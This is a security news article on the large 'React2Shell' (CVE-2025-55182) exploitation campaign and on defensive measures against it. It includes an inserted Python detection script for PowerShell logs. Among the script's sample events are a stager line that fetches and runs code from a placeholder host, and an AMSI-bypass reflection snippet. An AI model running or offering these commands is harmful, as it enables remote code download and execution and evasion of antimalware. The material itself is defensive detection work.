React2Shell Vulnerability Hit by 8.1 Million Attack Attempts

The React Server Components (RSC) “Flight” protocol remote code execution vulnerability, tracked as CVE-2025-55182 and publicly referred to as “React2Shell,” has become the target of a massive exploitation campaign that shows no signs of slowing.

Since the vulnerability’s initial disclosure, threat intelligence firm GreyNoise has recorded over 8.1 million attack sessions, with daily attack volumes stabilizing between 300,000 and 400,000 after peaking above 430,000 in late December 2025.

The sheer scale of this campaign underscores the critical nature of the vulnerability, which affects React, Next.js, and numerous downstream frameworks reliant on the RSC Flight protocol.

The affected technology sits directly in front of application logic that often runs with production-level permissions, making it a high-value target for threat actors across the ecosystem.

The exploitation infrastructure underpinning this campaign spans 8,163 unique source IP addresses distributed across 1,071 autonomous system numbers (ASNs) in 101 countries.

This geographic and network diversity reflects broad adoption of the exploit across numerous threat actor groups, from opportunistic automated botnets to more sophisticated threat operations.

8,163 Total IPs Observed Across Production & Research Sensors.

Amazon Web Services dominates the source network distribution, accounting for over one-third of all observed exploitation traffic.

The top 15 ASNs collectively comprise roughly 60 percent of source IPs, indicating that cloud infrastructure providers remain the preferred platform for orchestrating large-scale attack campaigns.

Diverse Payload Tactics

The campaign has generated over 70,000 unique payloads to date, reflecting continuous experimentation and iteration by attackers.

Network fingerprint analysis reveals 700 distinct JA4H hashes (HTTP client fingerprints) and 340 unique JA4T hashes (TCP stack fingerprints), demonstrating the variety of tooling and automation frameworks being deployed against vulnerable endpoints.

Attack patterns reveal a multi-stage exploitation methodology. Initial proof-of-execution (PoE) commands use simple PowerShell arithmetic operations to validate command execution with minimal endpoint artifacts.

Following successful validation, attackers deploy encoded PowerShell stagers using the standard “-enc” obfuscation technique combined with “DownloadString” and immediate execution (IEX) primitives to retrieve second-stage payloads.

Stage-two payloads employ reflection-based anti-malware bypass techniques targeting Windows AMSI (Antimalware Scan Interface), reflecting commodity exploitation practices widely documented across modern attack toolchains.

Approximately 50 percent of observed exploitation IPs were first seen by GreyNoise after July 2025, indicating heavy reliance on newly provisioned infrastructure and rapid IP rotation tactics typical of VPS and proxy pool operations.

Fresh Infrastructure Highlights Importance of Dynamic IP Blocking.

This pattern suggests opportunistic, largely automated exploitation rather than targeted intrusion activity, at least in the initial waves.

Defensive Recommendations

Organizations must prioritize patching React and Next.js deployments immediately. Network defenders should deploy GreyNoise’s dynamic blocklists targeting the identified exploitation source infrastructure, as static IP-based blocking alone remains insufficient given the volume and breadth of attacker infrastructure.

The sustained attack volume, infrastructure diversity, and rapid IP churn indicate this campaign will persist as threat actors continue integrating React2Shell into commodity botnet exploitation kits.

Endpoint defenders should monitor for process creation events combining PowerShell execution with encoded command parameters, “DownloadString” functionality, or the specific AMSI bypass reflection patterns.

PowerShell script block logging (Windows Event ID 4104) should be configured to alert on suspicious combinations involving System.Management.Automation.AmsiUtils and reflection-based field modification.
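A log-side triage of the indicators named above (encoded PowerShell commands, DownloadString/IEX, and AmsiUtils reflection with field modification), written as an added example that is not part of the article or of GreyNoise's tooling; the sample command lines, the `placeholder.invalid` host and the `<field>` placeholder are constructed, and the `-enc` payload is decoded so stagers hidden behind base64 still surface the second-stage indicators.

```python
import base64
import re

# Common spellings of the -EncodedCommand switch followed by its base64 argument.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
# Indicators taken from the recommendations above; scanned on raw and decoded text.
INDICATORS = {
    "download_string": re.compile(r"DownloadString", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "amsi_reflection": re.compile(r"AmsiUtils.*?(GetField|NonPublic).*?SetValue", re.I | re.S),
}

def decode_encoded_command(text):
    """Return the UTF-16LE payload of a PowerShell -enc argument, or None."""
    m = ENC_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or odd byte length
        return None

def classify(text):
    """Return the sorted indicator names found in one 4688/Sysmon 1/4104 line."""
    hits = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.add("encoded_command")
    for name, pat in INDICATORS.items():
        if pat.search(text) or (decoded and pat.search(decoded)):
            hits.add(name)
    return sorted(hits)

def enc(script):
    """Build a constructed -enc argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample events, not real telemetry: PoE arithmetic, a benign encoded
# command, a stager-shaped encoded command, and a 4104 script block touching AmsiUtils.
SAMPLE_EVENTS = {
    "poe_arithmetic": 'powershell.exe -nop -c "1337*2"',
    "benign_encoded": "powershell.exe -enc " + enc("Get-Date"),
    "stager": "powershell.exe -w hidden -enc "
        + enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s2')"),
    "amsi_scriptblock": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('<field>','NonPublic,Static').SetValue($null,$true)",
}

def triage(events=SAMPLE_EVENTS):
    """Map event name -> indicators; any amsi_reflection hit, or an encoded command
    combined with DownloadString/IEX, is the combination worth alerting on."""
    return {name: classify(line) for name, line in events.items()}
```

Plain PoE arithmetic deliberately yields no indicators, which matches the article's point that the first stage leaves minimal endpoint artifacts; the stager and AMSI stages are where the detections land.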

Defenders who move quickly on patching and implement high-quality endpoint detection remain positioned to contain this threat during its opportunistic initial phase.
